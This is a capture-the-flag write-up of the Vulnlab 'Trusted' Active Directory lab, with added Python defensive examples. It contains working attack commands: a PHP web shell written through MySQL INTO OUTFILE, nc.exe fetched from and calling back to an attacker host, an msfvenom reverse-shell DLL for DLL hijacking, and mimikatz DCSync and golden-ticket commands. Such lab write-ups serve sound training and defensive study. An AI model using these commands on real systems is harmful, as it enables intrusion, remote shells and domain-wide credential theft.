CTF-Writeups/Vulnlab/Trusted.md
2023-06-26 23:30:13 +05:00


Vulnlab - Trusted

10.10.212.5

NMAP

Nmap scan report for 10.10.212.5                                       
Host is up (0.097s latency).                       
Not shown: 65509 closed tcp ports (reset)          
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus                         
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-06-19 17:35:47Z)                    
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: trusted.vl0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: trusted.vl0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2023-06-19T17:37:17+00:00; +38s from scanner time.
| ssl-cert: Subject: commonName=trusteddc.trusted.vl
| Issuer: commonName=trusteddc.trusted.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-04-21T14:47:57
| Not valid after:  2023-10-21T14:47:57
| MD5:   45ea20be5e4bca32c9fc20b0d2c3801a
|_SHA-1: 46afd9e24c5f561f7de1089a8038b9f856db4b8a
| rdp-ntlm-info: 
|   Target_Name: TRUSTED
|   NetBIOS_Domain_Name: TRUSTED
|   NetBIOS_Computer_Name: TRUSTEDDC
|   DNS_Domain_Name: trusted.vl
|   DNS_Computer_Name: trusteddc.trusted.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2023-06-19T17:37:01+00:00
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0

10.10.212.6

NMAP

Nmap scan report for 10.10.212.6
Host is up (0.088s latency).                  
Not shown: 65508 closed tcp ports (reset)
PORT      STATE SERVICE       VERSION  
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Apache httpd 2.4.53 ((Win64) OpenSSL/1.1.1n PHP/8.1.6)
|_http-favicon: Unknown favicon MD5: 56F7C04657931F2D0B79371B2D6E9820
| http-title: Welcome to XAMPP
|_Requested resource was http://10.10.212.6/dashboard/
|_http-server-header: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6
| http-methods:                
|_  Supported Methods: GET HEAD POST OPTIONS
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-06-19 17:35:53Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn          
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: trusted.vl0., Site: Default-First-Site-Name)
443/tcp   open  ssl/http      Apache httpd 2.4.53 ((Win64) OpenSSL/1.1.1n PHP/8.1.6)
|_http-favicon: Unknown favicon MD5: 6EB4A43CB64C97F76562AF703893C8FD
| http-title: Welcome to XAMPP                            
|_Requested resource was https://10.10.212.6/dashboard/
| tls-alpn:                                
|_  http/1.1                                       
|_ssl-date: TLS randomness does not represent time 
| ssl-cert: Subject: commonName=localhost          
| Issuer: commonName=localhost                     
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2009-11-10T23:48:47
| Not valid after:  2019-11-08T23:48:47
| MD5:   a0a44cc99e84b26f9e639f9ed229dee0
|_SHA-1: b0238c547a905bfa119c4e8baccaeacf36491ff6
|_http-server-header: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3306/tcp  open  mysql         MySQL 5.5.5-10.4.24-MariaDB
| mysql-info: 
|   Protocol: 10
|_  Auth Plugin Name: mysql_native_password
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2023-06-19T17:37:17+00:00; +39s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: LAB
|   NetBIOS_Domain_Name: LAB
|   NetBIOS_Computer_Name: LABDC
|   DNS_Domain_Name: lab.trusted.vl
|   DNS_Computer_Name: labdc.lab.trusted.vl
|   DNS_Tree_Name: trusted.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2023-06-19T17:37:03+00:00
| ssl-cert: Subject: commonName=labdc.lab.trusted.vl
| Issuer: commonName=labdc.lab.trusted.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-04-21T14:48:14
| Not valid after:  2023-10-21T14:48:14
| MD5:   6b0e83e111daedeaeec7494630f036f6
|_SHA-1: 3b251ec4daa9f35d915589b7f6bb59fc071707c8
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0

PORT 445 (SMB)

Performing null authentication on SMB did not list any shares either

PORT 389 (LDAP)

On LDAP, null authentication did not work either

PORT 80/443 (HTTP/HTTPS)

The web server was running XAMPP

Fuzzing with gobuster revealed /dev

Visiting any of the pages shows that the HTML page name is passed in the GET parameter view

So we can test for Local File Inclusion (LFI) to see whether local files get included

http://10.10.212.6/dev/index.html?view=C:/WINDOWS/System32/drivers/etc/hosts

We can read the source of index.html by using the php://filter wrapper to base64-encode the file contents, since any PHP code in it would otherwise be executed instead of being returned as plain text

At the bottom we can see why local files could be included: the page calls include on the GET parameter and accepts any file. Secondly, there is a comment for Eric about setting up the database connection; fuzzing for PHP files turns up db.php
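The include above takes the view parameter as-is, which is why both the hosts file and the php://filter payload worked. Added example, not code from the write-up or the lab: the validation a page doing include on $_GET['view'] should perform first, written here in Python. The function names (rejection_reason, resolve_view) and the PAGE_NAME pattern are hypothetical; it assumes every page is a plain .html file inside one directory.

```python
import os
import re

# A page name is a bare file name ending in .html: no separators, no wrappers.
PAGE_NAME = re.compile(r"^[A-Za-z0-9_-]+\.html$")


def rejection_reason(view):
    """Explain why a 'view' value is not a page name, or return None if it looks fine."""
    if not isinstance(view, str) or not view:
        return "empty"
    if "://" in view:
        return "stream wrapper (e.g. php://filter)"
    candidate = view.replace("\\", "/")  # treat Windows separators like POSIX ones
    if candidate.startswith("/") or re.match(r"^[A-Za-z]:", candidate):
        return "absolute path"
    if ".." in candidate.split("/"):
        return "parent-directory traversal"
    if not PAGE_NAME.match(candidate):
        return "not a bare .html name"
    return None


def resolve_view(base_dir, view):
    """Return the absolute path to include, or None if 'view' must be rejected."""
    if rejection_reason(view) is not None:
        return None
    base = os.path.realpath(base_dir)
    full = os.path.realpath(os.path.join(base, view))
    # Defence in depth: even a name that passed the allow-list must resolve inside
    # base_dir (a symlinked page could otherwise point elsewhere).
    if os.path.commonpath([base, full]) != base:
        return None
    return full


if __name__ == "__main__":
    # Constructed requests: the write-up's two payloads plus legitimate and near-miss names.
    for v in ["index.html", "about.html",
              "C:/WINDOWS/System32/drivers/etc/hosts",
              "php://filter/convert.base64-encode/resource=index.html",
              "../db.php", "db.php"]:
        print(f"{v!r:62} -> {rejection_reason(v) or 'ok'}")
```

The allow-list regex alone blocks every payload shown; the earlier checks only make the refusal reasons explicit for logging, and the realpath containment check catches the case where an allowed name is a symlink out of the directory.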

From here we can get credentials to mysql

With these credentials we can login to mysql

In the news database, we can query the users table

Here we find three usernames, of which rsmith's hash was cracked

Trying to crack these hashes with Crackstation

We can check whether these credentials work on the target machine with crackmapexec

Checking the shares, there was nothing interesting

Un-Intended (SYSTEM)

Going back to MySQL: since we are the root user we may have the FILE privilege, so we can write a PHP file that executes system commands passed through a GET parameter

select "<?php system($_GET['cmd']); ?>" INTO OUTFILE 'C:/xampp/htdocs/dev/shell.php';
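Two conditions make the INTO OUTFILE above land in the web root: the account has the FILE privilege (root holds it through ALL PRIVILEGES) and secure_file_priv is unset, so writes are not confined to a directory. Added example, not code from the write-up or the lab: an audit of those two settings. secure_file_priv and FILE are real MariaDB/MySQL settings; the my.ini snippets, the SHOW GRANTS lines and the function names are constructed and hypothetical.

```python
import re

# Constructed: a [mysqld] section with no secure_file_priv (the weak setting).
WEAK_INI = """\
[mysqld]
port=3306
datadir="C:/xampp/mysql/data"
[mysql]
default-character-set=utf8mb4
"""

# Constructed: the same section restricting file I/O to one directory.
HARDENED_INI = """\
[mysqld]
port=3306
datadir="C:/xampp/mysql/data"
secure_file_priv="C:/xampp/mysql/upload"
"""

# Constructed SHOW GRANTS output for the account a db.php might use, weak and corrected.
ROOT_GRANTS = ["GRANT ALL PRIVILEGES ON *.* TO 'root'@'localhost' WITH GRANT OPTION"]
WEBAPP_GRANTS = ["GRANT USAGE ON *.* TO 'news'@'localhost'",
                 "GRANT SELECT, INSERT, UPDATE ON `news`.* TO 'news'@'localhost'"]


def secure_file_priv(my_ini_text):
    """Value of secure_file_priv in [mysqld], or None if unset.
    Unset or empty means INTO OUTFILE may write wherever the service account can."""
    in_mysqld = False
    for raw in my_ini_text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            in_mysqld = line.lower() == "[mysqld]"
            continue
        if not in_mysqld or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        if key.strip().lower().replace("-", "_") == "secure_file_priv":
            return value.strip().strip('"')
    return None


def has_file_privilege(grant_lines):
    """True if any GRANT confers FILE, directly or through ALL PRIVILEGES."""
    for line in grant_lines:
        m = re.match(r"GRANT\s+(.+?)\s+ON\s", line, re.IGNORECASE)
        if not m:
            continue
        privs = {p.strip().upper() for p in m.group(1).split(",")}
        if "ALL PRIVILEGES" in privs or "FILE" in privs:
            return True
    return False


def audit(my_ini_text, grant_lines):
    """List of findings; an empty list means neither condition for the write holds."""
    findings = []
    if not secure_file_priv(my_ini_text):
        findings.append("secure_file_priv unset or empty: INTO OUTFILE can target the web root")
    if has_file_privilege(grant_lines):
        findings.append("application account holds FILE: it can use INTO OUTFILE at all")
    return findings


if __name__ == "__main__":
    print("weak     :", audit(WEAK_INI, ROOT_GRANTS))
    print("hardened :", audit(HARDENED_INI, WEBAPP_GRANTS))
```

Either fix on its own breaks the write: a dedicated application account without FILE cannot use INTO OUTFILE, and a directory in secure_file_priv keeps even a FILE-holding account out of htdocs.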

Transferring nc.exe by setting up a python server to host the file

curl http://10.8.0.136/nc64.exe -o C:/Windows/Temp/nc.exe

Now executing it while having our netcat listener ready

C:/Windows/Temp/nc.exe 10.8.0.136 2222 -e cmd.exe

Intended (ewalters)

I wasn't able to run python-bloodhound, not sure what the issue was; since we have the SYSTEM user on LABDC, I decided to enumerate the lab.trusted.vl domain with sharphound.exe by downloading it through our python server

We can then download the SharpHound output through evil-winrm, since we have the administrator hash from the dump

Running BloodHound on the JSON files from SharpHound shows a path from rsmith to ewalters: rsmith has the ForceChangePassword ACL on ewalters, so we can change the password and log in via either WinRM or RDP, since ewalters has CanPSRemote on the host

Through rpcclient, ewalters's password can be changed

setuserinfo2 ewalters 23 'Ewwalter@123456'

With cme we can verify whether the password was actually updated, and we can log in through WinRM

In the C:/ drive there was a folder AVTest containing readme.txt, which talks about Christine running AV tools

Using smbserver.py to transfer KasperskyRemovalTool.exe

Privilege Escalation (cpowers)

Transferring the exe to a Windows machine and running Process Monitor (Procmon) to analyze which DLLs the exe loads; on launch, procmon captures all system events

Running KasperskyRemovalTool.exe so that its events get logged

Hit Ctrl+E to stop capturing system events and apply filters to only display the Kaspersky process

First applying the filter for the KasperskyRemovalTool process name

Next adding the filter for the DLL files

Lastly for DLLs that are not found. Here we see KasperskyRemovalToolENU.dll being requested but not found, so we need to create a 32-bit DLL since the exe is in PE32 format
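The three Procmon filters above (process name, .dll path, NAME NOT FOUND) can be applied to a CSV export of the capture as well, which makes the same check repeatable over many binaries. Added example, not code from the write-up or the lab: those filters in Python, then narrowed to the directories a low-privileged user can write, which is what turns a missing DLL into a finding. The CSV rows are constructed in Procmon's default export column layout; the PIDs, timestamps and extra rows are illustrative, and the function names are hypothetical.

```python
import csv
import io
import ntpath

# Constructed Procmon CSV export (default columns). Backslashes are doubled only
# because this is a Python string literal.
SAMPLE_CSV = '''\
"Time of Day","Process Name","PID","Operation","Path","Result","Detail"
"5:12:01.0001","KasperskyRemovalTool.exe","4120","CreateFile","C:\\AVTest\\KasperskyRemovalToolENU.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"5:12:01.0002","KasperskyRemovalTool.exe","4120","CreateFile","C:\\Windows\\System32\\KasperskyRemovalToolENU.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"5:12:01.0003","KasperskyRemovalTool.exe","4120","CreateFile","C:\\Windows\\System32\\kernel32.dll","SUCCESS","Desired Access: Read Attributes"
"5:12:01.0004","KasperskyRemovalTool.exe","4120","Load Image","C:\\Windows\\System32\\kernel32.dll","SUCCESS","Image Base: 0x7ff800000000"
"5:12:01.0005","KasperskyRemovalTool.exe","4120","CreateFile","C:\\AVTest\\readme.txt","SUCCESS","Desired Access: Generic Read"
"5:12:01.0006","explorer.exe","1337","CreateFile","C:\\Windows\\System32\\missing.dll","NAME NOT FOUND","Desired Access: Read Attributes"
'''

# Constructed: directories found to be writable by the low-privileged user.
USER_WRITABLE_DIRS = {r"C:\AVTest"}


def missing_dll_loads(csv_text, process_name):
    """DLL paths the given process tried to open but which did not exist (filters 1-3)."""
    hits = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        if row["Process Name"].lower() != process_name.lower():
            continue  # filter 1: only the process under analysis
        if not row["Path"].lower().endswith(".dll"):
            continue  # filter 2: only DLL lookups
        if row["Result"] != "NAME NOT FOUND":
            continue  # filter 3: only lookups that failed
        hits.append(row["Path"])
    return hits


def hijack_candidates(csv_text, process_name, writable_dirs):
    """Missing DLLs whose directory an unprivileged user can write to.
    The exe's own directory is searched first, so a DLL absent there and a
    writable directory is the condition to remove: ship the DLL, load it by
    full path, or keep the exe out of user-writable locations."""
    writable = {ntpath.normcase(d.rstrip("\\")) for d in writable_dirs}
    return [p for p in missing_dll_loads(csv_text, process_name)
            if ntpath.normcase(ntpath.dirname(p)) in writable]


if __name__ == "__main__":
    for path in missing_dll_loads(SAMPLE_CSV, "KasperskyRemovalTool.exe"):
        print("missing :", path)
    for path in hijack_candidates(SAMPLE_CSV, "KasperskyRemovalTool.exe", USER_WRITABLE_DIRS):
        print("writable:", path)
```

ntpath is used so the Windows paths parse correctly even when the script is run on Linux; the second System32 lookup is reported as missing but not as a candidate, since that directory is not in the writable set.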

msfvenom -p windows/shell_reverse_tcp LHOST=10.8.0.136 LPORT=2222 -f dll > KasperskyRemovalToolENU.dll

Transferring the DLL and placing it in C:/AVTest, as the DLL was being loaded from the same directory the exe was executed from

Now wait a few seconds for the exe to be triggered, which will execute our malicious DLL and give us a shell as cpowers

This user was a member of Domain Admins, so we have complete access to the first machine

Privilege Escalation (Enterprise Admin)

We can enumerate the trust between labdc.trusted.vl and trusted.vl

([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships()

nltest.exe /trusted_domains

Following this article, we can abuse this child->parent domain trust relationship and escalate to the enterprise domain. To do this we need the krbtgt hash of lab.trusted.vl and the SIDs of both domains; then with mimikatz we can forge a golden ticket for the enterprise domain admin

lsadump::dcsync /domain:lab.trusted.vl /all

Dumping ntds.dit with mimikatz to get the krbtgt hash

Getting the domain SIDs of lab.trusted.vl and trusted.vl by running lsadump::trust /patch

Now forging a ticket for enterprise domain admin

kerberos::golden /user:Administrator /krbtgt:c7a03c565c68c6fac5f8913fab576ebd /domain:lab.trusted.vl /sid:S-1-5-21-2241985869-2159962460-1278545866 /sids:S-1-5-21-3576695518-347000760-3731839591-519 /ptt
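The /sids: value is what carries the escalation: the parent domain accepts the child's ticket together with a SID from its own Enterprise Admins group (RID 519), because SID filtering is not applied on an intra-forest child->parent trust by default. Added example, not code from the write-up or the lab: a model of what SID filtering (the quarantine setting on a trust) would do to that ticket. The two domain SIDs and RID 519 come from the /sid: and /sids: values above; the ticket's other SIDs and all function names are constructed and hypothetical, and this models the check rather than calling any Windows API.

```python
import re

LAB_DOMAIN_SID = "S-1-5-21-2241985869-2159962460-1278545866"      # lab.trusted.vl (/sid:)
TRUSTED_EA_SID = "S-1-5-21-3576695518-347000760-3731839591-519"   # trusted.vl Enterprise Admins (/sids:)

# Well-known domain-relative RIDs that carry domain- or forest-wide control.
PRIVILEGED_RIDS = {500: "Administrator", 512: "Domain Admins", 516: "Domain Controllers",
                   518: "Schema Admins", 519: "Enterprise Admins"}

SID_RE = re.compile(r"^(S-1-5-21-\d+-\d+-\d+)-(\d+)$")


def split_sid(sid):
    """(domain SID, RID) for a domain SID; raises ValueError for anything else."""
    m = SID_RE.match(sid)
    if not m:
        raise ValueError(f"not a domain SID: {sid}")
    return m.group(1), int(m.group(2))


def sid_filter(ticket_sids, issuing_domain_sid):
    """Apply SID filtering as quarantine on a trust enforces it: keep only SIDs
    that belong to the domain that issued the ticket, drop every foreign one.
    Returns (kept, dropped). Child->parent trusts inside a forest do not apply
    this by default, which is the gap the /sids: option relies on."""
    kept, dropped = [], []
    for sid in ticket_sids:
        domain, _ = split_sid(sid)
        (kept if domain == issuing_domain_sid else dropped).append(sid)
    return kept, dropped


def privileged_foreign_sids(ticket_sids, issuing_domain_sid):
    """Foreign SIDs whose RID is privileged: the ones a detection should alert on."""
    _, dropped = sid_filter(ticket_sids, issuing_domain_sid)
    return [sid for sid in dropped if split_sid(sid)[1] in PRIVILEGED_RIDS]


def describe(sid):
    domain, rid = split_sid(sid)
    return f"{domain} RID {rid} ({PRIVILEGED_RIDS.get(rid, 'no privileged RID')})"


if __name__ == "__main__":
    # Constructed PAC contents: the forged Administrator (RID 500), Domain Users (513),
    # and the parent domain's Enterprise Admins SID injected through /sids:.
    ticket = [LAB_DOMAIN_SID + "-500", LAB_DOMAIN_SID + "-513", TRUSTED_EA_SID]
    kept, dropped = sid_filter(ticket, LAB_DOMAIN_SID)
    for sid in dropped:
        print("would be filtered:", describe(sid))
```

With filtering applied the ticket still authenticates as the child's Administrator, but the foreign RID 519 SID is discarded, so the DCSync against trusteddc.trusted.vl would fail; the flip side is that quarantining an intra-forest trust is disruptive, so the usual mitigation is treating the whole forest, not the domain, as the security boundary and protecting every DC's krbtgt accordingly.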

All that is left is to dump ntds from trusted.vl domain

lsadump::dcsync /domain:trusted.vl /dc:trusteddc.trusted.vl /all

Having the administrator's hash from trusted.vl, we can login through WinRM and complete this AD chain.

Even though we are administrator on the machine, the flag still wasn't readable; it was giving access denied

Here I had to log in as the administrator by changing his password and then grab the flag

References